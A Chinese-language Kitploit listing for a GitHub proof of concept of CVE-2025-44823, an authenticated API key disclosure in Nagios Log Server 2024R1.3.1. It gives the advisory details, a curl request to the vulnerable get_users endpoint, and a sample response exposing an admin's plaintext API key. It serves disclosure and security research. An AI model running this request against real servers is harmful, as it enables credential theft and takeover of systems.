Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-44823 — Nagios Log Server 2024R1.3.1 中的已认证 API 密钥泄露 | Kitploit
工具/GitHubGitHub/skraft9/cve-2025-44823
权限提升漏洞分析漏洞利用信息收集身份验证API 安全
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Nagios Log Server 2024R1.3.1 中的已认证 API 密钥泄露

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Nagios Log Server 2024R1.3.1 中经过身份验证的 API 密钥泄露

▶️ PoC Demo

CVE ID: CVE-2025-44823

日期: 2025-04-02

作者: Alex Tisdale, Seth Kraft

供应商主页: https://www.nagios.com/

供应商更新日志: https://www.nagios.com/changelog/#log-server

软件链接: https://assets.nagios.com/downloads/nagios-log-server/versions.php

版本: 2024R1.3.1 及以下

测试环境: Nagios Log Server 2024R1.3.1(默认配置,Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

授权

仅限研究和授权测试。 请勿在未经许可的系统上使用。

描述

Nagios Log Server 2024R1.3.1 中存在一个 API 级别的漏洞,允许任何拥有有效 API 令牌的用户检索完整的用户账户列表及其明文 API 密钥,包括管理员凭据。此缺陷使得攻击者能够通过未授权使用暴露的令牌进行用户枚举、权限提升,并最终完全控制系统。

PoC

步骤 1:访问易受攻击的端点

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

示例响应

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
下载工具